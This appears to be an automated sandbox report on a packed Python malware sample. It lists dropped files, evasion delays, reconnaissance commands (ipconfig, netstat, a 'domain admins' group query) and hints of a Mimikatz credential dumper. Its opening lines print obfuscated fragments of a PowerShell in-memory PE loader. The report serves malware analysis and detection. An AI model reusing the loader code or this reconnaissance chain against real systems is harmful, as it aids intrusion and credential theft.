Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: fineField('e_cparhdr', [UInt16], 'Public') | Out-Null$LHFSser.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null$LHFSser.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null$LHFSser.DefineFi
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: dy kernel32.dll GetExitCodeThread$GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])$GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateFo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: [Parameter(Position = 1, Mandatory = $true)][System.Object]$DJH32H)$NINOFSD = New-Object System.Object$dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LKSHKDANDL, [Type]$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: Function LGDJSR{$DJH32H = New-Object System.Object$Domain = [AppDomain]::CurrentDomain$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')$AssemblyBuilder = $Domain.DefineDy
Source: UlJpFEz1Cj.exe | Static PE information: real checksum: 0x6aa63f should be: 0x6b21de
Source: Crypto.Cipher._ARC4.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xb865
Source: Crypto.Cipher._DES.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x13233
Source: Crypto.Cipher._DES3.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xf535
Source: Crypto.Cipher._AES.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x16ef1
Source: Crypto.Hash._MD4.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x63cc

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\python27.dll
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\_ssl.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\pywintypes27.dll
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._MD4.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\win32wnet.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\msvcr90.dll
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\pyexpat.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\msvcp90.dll
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\win32event.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\bz2.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\msvcm90.dll
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\_socket.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\win32pipe.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\_mssql.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\_hashlib.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util._counter.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES3.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util.strxor.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\_ctypes.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\win32api.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\unicodedata.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._SHA256.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Random.OSRNG.winrandom.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\select.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282\_multiprocessing.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Thread delayed: delay time: 3600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5859
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2348
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\_mssql.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\_ssl.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util._counter.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES3.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util.strxor.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\win32wnet.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._MD4.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\unicodedata.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\pyexpat.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Random.OSRNG.winrandom.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._SHA256.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\msvcp90.dll
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\msvcm90.dll
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\bz2.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\_socket.pyd
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\win32pipe.pyd
Source: C:\Windows\System32\conhost.exe TID: 6616 | Thread sleep count: 256 > 30
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe TID: 6988 | Thread sleep time: -18000000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032 | Thread sleep count: 5859 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028 | Thread sleep count: 2348 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net group 'domain admins' /domain
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\AppData\Local\Temp\_MEI65282\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\AppData\Local\Temp\_MEI65~1\
Source: WMIC.exe, 00000005.00000002.210837033.0000000000E00000.00000002.00000001.sdmp, net1.exe, 0000000B.00000002.217845921.0000000003770000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 0000000C.00000003.261817341.000001FD8332D000.00000004.00000001.sdmp | Binary or memory string: ZXJ2ZXJMaXN0ZW4AxAFScGNTZXJ2ZXJSZWdpc3RlckF1dGhJbmZvVwAAiAFScGNFcFVucmVnaXN0ZXIAhgFScGNFcFJlZ2lzdGVyVwAAvAFScGNTZXJ2ZXJJbnFCaW5k
Source: WMIC.exe, 00000005.00000002.210837033.0000000000E00000.00000002.00000001.sdmp, net1.exe, 0000000B.00000002.217845921.0000000003770000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WMIC.exe, 00000005.00000002.210837033.0000000000E00000.00000002.00000001.sdmp, net1.exe, 0000000B.00000002.217845921.0000000003770000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: NETSTAT.EXE, 00000024.00000002.436374601.00000000031F7000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: WMIC.exe, 00000005.00000002.210837033.0000000000E00000.00000002.00000001.sdmp, net1.exe, 0000000B.00000002.217845921.0000000003770000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process token adjusted: Debug
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Queries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_multiprocessing.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_hashlib.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_socket.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_ssl.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\win32event.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\win32api.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_mssql.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\select.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._MD4.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util.strxor.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES3.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\bz2.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\m2.ps1 VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\mkatz.ini VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Gathers network related connection and port information
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -na

Mitre Att&ck Matrix

